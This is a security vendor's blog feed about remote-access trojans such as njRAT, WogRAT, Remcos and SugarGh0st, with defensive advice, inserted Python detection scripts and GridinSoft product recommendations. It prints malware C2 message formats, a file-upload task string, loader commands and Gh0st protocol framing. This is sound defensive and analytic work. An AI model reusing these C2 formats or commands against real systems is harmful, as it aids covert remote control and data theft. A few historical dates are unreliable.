NjRAT is probably the best known and the oldest among remote-access trojans. It first appeared in 2012 and keeps getting updates that adjust its functionality to modern “standards”, which accounts for its longevity. The reason for this is probably the attention from state-sponsored threat actors – APT36 and APT41 – who have used it in cyberattacks almost since its inception.

Njrat interface
Interface of njRAT 0.7 Golden edition

The key functionality of njRAT is typical for pretty much any remote-access trojan – it is about providing remote access. This is complemented by uploading and downloading files on command, logging keystrokes, and capturing microphone and camera input. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses the Mimikatz password stealer to authenticate via pass-the-hash, reusing operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting industrial control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly and Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, its developers released two significant versions of the RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and anti-forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable Task Manager, the firewall, or User Account Control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user already has such permissions. Since VNC is a legitimate tool, antivirus tools do not identify Heseber as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, a strategy for defending against RATs depends on organization-wide security training. Victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant so as not to accidentally contaminate the company network and jeopardize the entire organization.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

  • More strict firewall settings
  • Safelisting IP addresses for authorized users
  • Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, a Remote Access Trojan is a threat only if it is installed and executed on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of a RAT infection. Overall, these actions are good practice for improving security in any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but carry malicious features alongside the actual application’s functionality. Tracking the application and the system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.
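As an added example (not code from the original post), the following Python script applies the network-monitoring advice above to a small constructed connection log: it flags flows that reconnect to the same host at near-constant intervals, the check-in rhythm of a C&C channel, and flows to the Back Orifice default port mentioned above. The log format, addresses and thresholds are assumptions made for this example.

```python
"""Added example (not from the Gridinsoft post): spot RAT-style C2
check-ins in a connection log.

A RAT keeps its command-and-control channel alive by reconnecting to the
same remote host at fixed intervals and, for old tools like Back Orifice,
on a well-known default port (31337). Both patterns are visible in plain
connection logs. The log format and all addresses below are constructed
for this example (RFC 5737 documentation ranges).
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log, one connection per line:
# "<timestamp> <src> -> <dst>:<port> <proto>"
SAMPLE_LOG = """\
2024-05-16T10:00:00 10.0.0.5 -> 203.0.113.10:443 TCP
2024-05-16T10:00:03 10.0.0.5 -> 198.51.100.20:443 TCP
2024-05-16T10:01:00 10.0.0.5 -> 203.0.113.10:443 TCP
2024-05-16T10:01:17 10.0.0.5 -> 198.51.100.21:80 TCP
2024-05-16T10:02:00 10.0.0.5 -> 203.0.113.10:443 TCP
2024-05-16T10:02:41 10.0.0.5 -> 198.51.100.22:443 TCP
2024-05-16T10:03:01 10.0.0.5 -> 203.0.113.10:443 TCP
2024-05-16T10:04:00 10.0.0.5 -> 203.0.113.10:443 TCP
2024-05-16T10:04:30 10.0.0.7 -> 192.0.2.99:31337 UDP
"""

# Default port historically used by Back Orifice (see the post above).
KNOWN_RAT_PORTS = {31337: "Back Orifice default port"}


def parse_line(line):
    """Split one log line into (timestamp, src, dst, port, proto)."""
    ts, src, _arrow, dst_port, proto = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port), proto


def find_beacons(log_text, min_hits=4, max_jitter=0.2):
    """Return {(src, dst, port): average_gap_seconds} for flows whose
    inter-connection intervals are nearly constant, i.e. whose coefficient
    of variation (stddev / mean) is at or below max_jitter."""
    flows = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, port, _proto = parse_line(line)
            flows[(src, dst, port)].append(ts)

    beacons = {}
    for key, times in flows.items():
        if len(times) < min_hits:
            continue  # too few connections to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[key] = round(avg, 1)
    return beacons


def find_known_rat_ports(log_text):
    """Return (src, dst, port, reason) for connections to known RAT ports."""
    hits = []
    for line in log_text.splitlines():
        if line.strip():
            _ts, src, dst, port, _proto = parse_line(line)
            if port in KNOWN_RAT_PORTS:
                hits.append((src, dst, port, KNOWN_RAT_PORTS[port]))
    return hits


if __name__ == "__main__":
    for flow, gap in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon {flow}: every ~{gap}s")
    for hit in find_known_rat_ports(SAMPLE_LOG):
        print(f"known RAT port: {hit}")
```

Real C2 traffic often adds random sleep to its interval, so in practice the jitter threshold is tuned per environment and combined with other signals such as destination reputation.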

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

WingsOfGod.dll – WogRAT Malware Analysis & Removal
https://gridinsoft.com/blogs/wograt-wingsofgod-analysis-removal/
Fri, 08 Mar 2024 17:17:12 +0000
WogRAT, also known as WingsOfGod RAT, is a newcomer remote access trojan that attacks users from Asian countries. Named after its own file – Wingsofgod.dll, this malware has been attacking people since late 2022, spreading through an online notepad service.

What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic example of a remote access trojan, a backdoor-like malicious program that focuses on providing remote access to the infected system. ASEC researchers were the first to detect and track the malware campaign. They additionally emphasize that this malicious program primarily targets Asian countries – China, Japan, Singapore and Hong Kong in the first place.

The strange thing about WogRAT is that its spreading campaigns were not detected, even though some of the methods were explained in the original research. The malware (more specifically – its loader) is disguised as a file posted on an online notepad service. Its naming suggests that the fraudsters offer WogRAT as a system/program tweaking utility of some sort. This, in turn, suggests that the initial spreading of the malware happens in “closed” places, like chats in messengers or the like.

Encoded strings aNotepad
Encoded strings stored in aNotepad

Names for malware loader files that are available from aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As I said, the original download from the aNotepad site gets only the malware loader in encoded form. Upon execution, it compiles itself on the fly and requests the actual payload from a different page hosted on the same site. Depending on the attack, the source for the second-stage payload may differ.

The command used by the loader to compile itself:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP

The downloaded file is a similar .NET assembly, encoded with Base64 and present as a text string on the source website. The loader decodes the payload and loads it into memory using the process hollowing technique.

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068

Upon startup, WogRAT collects basic system information by checking different registry keys and executing commands. In particular, it gathers info about network connections, system version, username and some of the info regarding system policies. The malware bundles this data with the info about its own process and sends it to the command server in an HTTP POST request. After that, the malware switches to idle, waiting for commands.

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT has a rather interesting set of commands and properties that it is expecting to receive. The simplified formula consists of 3 elements, and looks like this:

Element            Value and purpose
task_id=%id%       text value, corresponds to the task
task_type=%type%   numeric value, corresponds to the action
task_data=%data%   path to the file that the task should be applied to (URL for downloads)

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

This malware supports 5 different types of operations: running specific files, downloading or uploading files, altering the idle time, and terminating the execution. Not a huge list at first glance, but in combination with different task types this gives full-fledged backdoor functionality.
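As an added example (not code from the post or from the malware), here is a Python parser for the two WogRAT message shapes described above, the check-in POST body and the task string, of the kind one would run over captured HTTP bodies to confirm an infection. The task_type mapping is an assumption except for type 3, which the post's sample pairs with the upload task; the benign form body in the sample set is constructed.

```python
"""Added example (not from the Gridinsoft post): recognise WogRAT check-in
and task messages in captured HTTP POST bodies.

Grounded in the post: the check-in body "act=on&bid=<id>&name=<host>\\<user>"
and the task format "task_id=...&task_type=...&task_data=...", where the
sample "task_id=upldr&task_type=3&..." corresponds to a file upload. The
meaning of other task_type values is NOT given in the post; the mapping
below therefore only contains type 3 and reports the rest as placeholders.
"""
import re
from urllib.parse import parse_qs

# Assumption: only type 3 is grounded in the post's sample; others unknown.
TASK_TYPES = {3: "upload file"}

# bot id as seen in the post: 4 digits, a dash, 13 digits (millisecond time)
BID_RE = re.compile(r"^\d{4}-\d{13}$")

# Constructed sample bodies: two from the post, one benign login form.
SAMPLE_BODIES = [
    "act=on&bid=4844-1708721090438&name=System1\\User1",
    r"task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts",
    "username=alice&password=hunter2",
]


def classify_body(body):
    """Return ("checkin", fields), ("task", fields) or None for a POST body."""
    # parse_qs gives lists; each WogRAT key appears once, so take [0]
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

    name = fields.get("name", "")
    if fields.get("act") == "on" and BID_RE.match(fields.get("bid", "")) \
            and "\\" in name:
        host, user = name.split("\\", 1)
        return "checkin", {"bid": fields["bid"], "host": host, "user": user}

    if {"task_id", "task_type", "task_data"}.issubset(fields):
        try:
            ttype = int(fields["task_type"])
        except ValueError:
            return None  # task_type must be numeric per the post
        return "task", {
            "task_id": fields["task_id"],
            "task_type": ttype,
            "action": TASK_TYPES.get(ttype, "unknown (placeholder)"),
            "task_data": fields["task_data"],
        }
    return None


def scan_bodies(bodies):
    """Return [(index, kind, fields)] for every body that matches WogRAT."""
    hits = []
    for i, body in enumerate(bodies):
        result = classify_body(body)
        if result is not None:
            hits.append((i, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for idx, kind, fields in scan_bodies(SAMPLE_BODIES):
        print(f"body {idx}: WogRAT {kind} {fields}")
```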

How to remove WogRAT?

WogRAT is not the stealthiest malware out there; it is in fact more reliant on the tricky spreading method and double-staged loader. Still, the amount of hooks it creates in the system makes it particularly hard to remove manually. For that reason, I recommend using GridinSoft Anti-Malware: a full scan with that program will be enough to repel the RAT and all of its parts across the system.

Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide
https://gridinsoft.com/blogs/backdoorwin32-bladabindiml-analysis-removal-guide/
Tue, 05 Mar 2024 14:37:22 +0000
Backdoor:Win32/Bladabindi!ml is a generic detection name used by Microsoft Defender. It specifically refers to a backdoor malware known as njRAT, capable of hacking into and controlling victims’ computers. In this article, we will look at when it is a dangerous trojan and when it is a false positive detection.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Windows Defender detection for the njRAT malware, which is categorized as a backdoor. “Bladabindi” is one of many names used by antivirus companies to categorize and identify various malware, including njRAT.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

njRAT execution chain

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection upon launch. It comes with its own builder, which allows hackers to pre-configure the payload to their needs before it is delivered to the victim’s computer. This includes the name of the executable file, startup key creation in the registry, directory placement within the target system, host IP address, and network port, among others.

setup njRAT builder
njRAT builder and custom settings

Such customization enables njRAT to circumvent many static checks, helping it avoid antivirus detection. Additionally, the malware utilizes multiple .NET obfuscators, making its code challenging to analyze for both humans and automated systems. These features make njRAT a tough nut to both analyze and detect and obviously account for its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures its persistence within the infected system by creating a startup instance, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also manipulates the Windows registry by creating a key with a unique name and a random set of characters and digits under the “HKEY_CURRENT_USER\Software\32” hive. These actions ensure that the malware executes each time the system boots up. They maintain a foothold within the infected machine even after reboots.

Registry of malware
Registry entry created by the malware during installation

Data Collection & Other Functionality

After finalizing the preparations, njRAT a.k.a. Bladabindi performs some basic callouts to the command server. Depending on the response, the malware can switch to idle, start collecting user data, or pull an additional payload from the remote server. The overall list of actions it can perform is the following:

  • Executing remote shell commands
  • Downloading and uploading files
  • Capturing screenshots
  • Logging keystrokes
  • Camera and microphone access
  • Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some programs may have features or behaviors that may be mistakenly considered suspicious by antivirus software. As a result, Windows Defender shows a false positive detection. This may be due to the use of certain APIs, network requests, or data encryption that may be characteristic of malware but are also present in legitimate applications.

It’s also worth noting that the antivirus often adds “!ml” to the end of a detection name to indicate the use of its AI detection system. Although it is a highly effective method, without confirmation from other detection systems it can easily generate false positive detections.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a reliable antivirus program with updated virus databases. I recommend an antivirus like GridinSoft Anti-Malware; it is among the best at detecting and removing even sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

Remcos RAT Targets South Korean Users Through Webhards
https://gridinsoft.com/blogs/remcos-rat-targets-south-korea-webhards/
Mon, 15 Jan 2024 21:39:20 +0000
The infamous Remcos RAT has reportedly started targeting South Korean users through files shared on the Webhards platform. By baiting users with cracked software and adult content, hackers manage to install a malicious script that in turn downloads and runs the dangerous remote access trojan.

Remcos RAT Uses Webhards to Spread

Recent research from the South Korean cybersecurity firm AhnLab shares its observations regarding a new Remcos RAT spreading campaign. The company names Webhards as the source of choice for this malware to infiltrate user devices. Webhards is a file sharing platform, popular among computer pirates and people who seek free content. It may be used for legitimate purposes, though a number of analysts name it a popular source of malware, along with torrents.

In the case of Remcos RAT, hackers use “hot topics” – either adult content or cracked versions of new games – to make the user download the infected package. Then, the publication on the aforementioned site asks the user to run a Game.exe file that is present in the downloaded archive. Upon running the executable file, a chain of VBS scripts is executed to download the final payload.

Game.exe Remcos RAT
ZIP archive with a cracked game, that features the aforementioned Game.exe file. Source: AhnLab

Upon downloading, another set of scripts injects Remcos into a system process called ServiceModelReg.exe. This is a built-in console utility that is, in fact, used only during the system installation and has no further application. Well, until this instance of Remcos finds its way to the machine, apparently.

What is Remcos RAT?

Remcos is a remote access trojan, marketed as a legit remote access tool by the German firm BreakingSecurity. Released in 2019, it became particularly popular in 2020 and 2021, when threat actors were using Covid-themed emails to spread it. Later though, its activity became much more moderate, averaging 30 samples per day during 2023.

Malware activity
Remcos RAT activity graphic (12/17/2023 – 01/15/2024)

In terms of functionality, this malware is a classic example of a RAT: Remcos provides full-featured remote access to the infected system, including access to system menus and the file system. Additionally, it is capable of recording the screen, taking screenshots and setting the activity alarm. To tell target systems apart, the malware collects some basic information – OS version, date, time, and some basic hardware info.

How to protect against threats?

The way the malware spreads already points to the defence. In the Remcos case the obvious answer is to avoid cracked software: besides the malware risk it is copyright infringement, and download sites known to be used for malware distribution deserve particular caution.

As an additional, passive layer of protection, keep anti-malware software running in the background. A modern, well-maintained antivirus blocks most commodity malware regardless of family, although no product stops every attack. GridinSoft Anti-Malware is one option you can rely on; its detection system combines proactive and reactive approaches.

Remcos RAT Targets South Korean Users Through Webhards

SugarGh0st RAT Targets Uzbekistan and South Korea
https://gridinsoft.com/blogs/sugargh0st-rat-targets-governments/
Fri, 01 Dec 2023 22:24:44 +0000

A new malicious campaign employs SugarGh0st RAT to target government agencies. Artifacts in the decoy documents hint at a potential Chinese-speaking actor.

SugarGh0st Uses Spear Phishing to Attack Governments

Researchers at Cisco Talos have uncovered a new wave of attacks against government entities in Uzbekistan and South Korea. The campaign uses a customised variant of the well-known Gh0st RAT, dubbed SugarGh0st, and a sophisticated multi-stage infection chain.

The targets were foreign ministry personnel, lured with documents about investment projects, account credentials and internal memos, topics chosen so that victims would enable the malware while believing they were viewing legitimate work documents. The choice of targets is consistent with Chinese state interests, although, as discussed below, attribution remains tentative.

Decoy document used to disguise the launch of the malware

Multi-stage infection chain

Once delivered by email, the malicious documents trigger a multi-stage process to install SugarGh0st. JavaScript and Windows shortcut (LNK) files execute commands that drop the RAT executable, decrypt it and activate its full functionality in the background. Living-off-the-land binaries, DLL side-loading and abuse of legitimate Windows utilities help hide the deployment from defences and from the user. The operational security on display suggests an adversary that honed its tradecraft before turning to foreign ministry networks.
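Both loader chains in this feed end with a legitimate Windows binary doing something it should not: the Remcos campaign described earlier finishes with script stages injecting into ServiceModelReg.exe, and the SugarGh0st chain uses shortcut-launched JavaScript and DLL side-loading through a Windows utility. The hunting script below is an added example, not code from the original posts or from AhnLab or Cisco Talos. It runs two rules over constructed Sysmon-style process-create (EventID 1) and network-connect (EventID 3) events; the pids, user names, file names and the rundll32 entry point in the sample telemetry are made up, and the drop directories are assumptions modelled on the behaviour the posts describe.

```python
"""Hunt for script-host -> LOLBin loader chains in process telemetry (added example)."""
import re

# Constructed sample telemetry. Field names mirror Sysmon EventID 1 (process
# create) and EventID 3 (network connect); none of this is real data.
EVENTS = [
    {"id": 1, "pid": 4000, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\winlogon.exe", "cmd": "explorer.exe"},
    # SugarGh0st-style chain: a shortcut opened from Explorer runs a JavaScript dropper...
    {"id": 1, "pid": 4101, "ppid": 4000, "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'wscript.exe "C:\Users\kim\AppData\Local\Temp\memo.js"'},
    # ...which side-loads a DLL from %TEMP% through rundll32 (DLL name and export are made up).
    {"id": 1, "pid": 4102, "ppid": 4101, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmd": r"rundll32.exe C:\Users\kim\AppData\Local\Temp\libcurl.dll,main"},
    # Remcos-style chain: a VBS stage launches ServiceModelReg.exe, which then beacons out.
    {"id": 1, "pid": 4201, "ppid": 4000, "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'wscript.exe "C:\Users\kim\Downloads\Game\setup.vbs"'},
    {"id": 1, "pid": 4202, "ppid": 4201,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe",
     "parent": r"C:\Windows\System32\wscript.exe", "cmd": "ServiceModelReg.exe"},
    {"id": 3, "pid": 4202,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe",
     "dst": "203.0.113.7:2404"},
    # Benign control: an administrator runs the same tool from cmd.exe with no network activity.
    {"id": 1, "pid": 4300, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "cmd.exe"},
    {"id": 1, "pid": 4301, "ppid": 4300,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "ServiceModelReg.exe -ia"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Locations an ordinary user can write to; a DLL loaded from here by rundll32 is suspicious.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads)\\|\\programdata\\|\\windows\\temp\\", re.I
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' stays '')."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return (rule_name, pid) for every process matching one of the two rules."""
    findings = []
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    net_pids = {e["pid"] for e in events if e["id"] == 3}
    for pid, e in procs.items():
        img = basename(e["image"])
        parent = basename(e.get("parent", ""))
        cmd = e.get("cmd", "")
        # Rule 1: rundll32 started by a script host, loading a DLL from a user-writable path.
        if img == "rundll32.exe" and parent in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
            findings.append(("script_host_rundll32_sideload", pid))
        # Rule 2: ServiceModelReg.exe spawned by a script host, or talking to the network at all.
        # A legitimate run from an admin shell without network activity (pid 4301) is not flagged.
        if img == "servicemodelreg.exe" and (parent in SCRIPT_HOSTS or pid in net_pids):
            findings.append(("servicemodelreg_anomaly", pid))
    return findings


if __name__ == "__main__":
    for rule, pid in hunt(EVENTS):
        print(f"{rule}: pid {pid}")
```

The second rule deliberately keys on behaviour rather than on the binary alone, because ServiceModelReg.exe is a genuine Microsoft tool that administrators may occasionally run; the parent process and any outbound connection are what separate the hollowed instance from a legitimate one.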

Once installed, SugarGh0st offers monitoring, exfiltration and manipulation capabilities beyond those of typical commodity cybercrime malware: keystroke logging, webcam activation, file execution and process termination, all directed dynamically by operator commands. Such comprehensive access puts the integrity of infected agencies at risk through unconstrained internal spying.

Depending on the victims' operational security, lateral movement could extend the compromise to wider departments and ministry networks. The total damage is hard to assess, but the implications are serious: stolen secrets of this kind can affect international affairs and relations.

A Gh0st RAT Variant and Potential Chinese Connection

While attribution remains speculative, artifacts in the decoy documents hint at a Chinese-speaking actor: two files in the campaign carry Chinese characters in their "last modified by" metadata. As the name suggests, SugarGh0st is an evolution of Gh0st RAT, a family with Chinese links that has circulated for over 15 years. Gh0st RAT was developed by the Chinese group 红狼小组 (C. Rufus Security Team) and has been in use since 2008; its source code is public, which is why so many forks of it exist.

SugarGh0st retains the core functionality of its predecessor but adds customised reconnaissance capabilities and a modified communication protocol, giving the operators full remote control over infected hosts and the confidential data on them. Enhancements include:

  • expanded anti-detection tactics
  • reconnaissance commands tailored to harvest documents and credentials
  • new communications disguising C2 servers as Google Drive domains
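To make the "modified communication protocol" concrete, here is an added example (not SugarGh0st's code, nor the Gh0st authors') implementing the classic Gh0st RAT framing as documented in public analyses of the leaked source: a five-byte magic string Gh0st, a little-endian total frame length, a little-endian uncompressed length, then a zlib-compressed body. Forks commonly keep this 13-byte layout and swap the magic, so the classifier also reports a "gh0st-like" frame whose length fields and zlib body check out under a different alphanumeric magic. The payload bytes are constructed; SugarGh0st's actual wire format differs and is not reproduced here.

```python
"""Classic Gh0st RAT framing: build, parse, scan and classify (added example)."""
import struct
import zlib

MAGIC = b"Gh0st"
HEADER = struct.Struct("<5sII")  # magic, total frame length, uncompressed body length


def build_frame(payload: bytes, magic: bytes = MAGIC) -> bytes:
    """Frame a payload the way classic Gh0st does: 13-byte header + zlib-compressed body."""
    body = zlib.compress(payload)
    return HEADER.pack(magic, HEADER.size + len(body), len(payload)) + body


def parse_frame(data: bytes):
    """Return (payload, remaining_bytes); raise ValueError on anything malformed."""
    if len(data) < HEADER.size:
        raise ValueError("short header")
    magic, total, orig = HEADER.unpack_from(data)
    if magic != MAGIC:
        raise ValueError(f"unknown magic {magic!r}")
    if total < HEADER.size or total > len(data):
        raise ValueError("length field does not fit the buffer")
    try:
        body = zlib.decompress(data[HEADER.size:total])
    except zlib.error as exc:
        raise ValueError("body is not zlib data") from exc
    if len(body) != orig:
        raise ValueError("uncompressed length mismatch")
    return body, data[total:]


def scan_stream(stream: bytes) -> list:
    """Collect every complete, well-formed classic Gh0st frame at the head of a TCP stream."""
    frames = []
    while stream:
        try:
            payload, stream = parse_frame(stream)
        except ValueError:
            break
        frames.append(payload)
    return frames


def classify(data: bytes) -> str:
    """'gh0st' for the original magic; 'gh0st-like' when the header layout and zlib body
    check out but the magic was swapped (a common fork tweak); 'none' otherwise."""
    if len(data) < HEADER.size:
        return "none"
    magic, total, orig = HEADER.unpack_from(data)
    if not HEADER.size <= total <= len(data):
        return "none"
    try:
        body = zlib.decompress(data[HEADER.size:total])
    except zlib.error:
        return "none"
    if len(body) != orig:
        return "none"
    if magic == MAGIC:
        return "gh0st"
    return "gh0st-like" if magic.isalnum() else "none"


if __name__ == "__main__":
    # Constructed check-in payload: a one-byte command id followed by host info.
    sample = build_frame(b"\x65host=FM-WS-07;os=Windows 10")
    print(classify(sample), classify(build_frame(b"x", b"cb1st")), classify(b"GET / HTTP/1.1\r\n"))
```

When reviewing captured traffic, a frame that the classifier calls "gh0st-like" is exactly the signal this post is about: the same lineage with a changed header, which a signature keyed only on the literal Gh0st magic would miss.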

Attacks on government entities, particularly embassies and ministries, are nothing new. States have always spied on each other; only the tools differ. Where most governments keep their tooling out of sight, groups linked to Asian governments seem unconcerned about theirs being exposed, and Chinese and North Korean actors are among the most publicly documented.

HiatusRAT Used in Attacks on Taiwan Companies and U.S. Military
https://gridinsoft.com/blogs/hiatusrat-attacks-taiwan-us-military/
Tue, 22 Aug 2023 10:20:01 +0000

The recent attacks on US military systems and Taiwanese companies stand out not only for the boldness of the target selection but also for the toolkit used. Against both targets the attackers used HiatusRAT as an initial access and reconnaissance tool, and the Hiatus trojan has a history of its own beyond these attacks.

US DoD and Taiwan Companies Cyberattacks

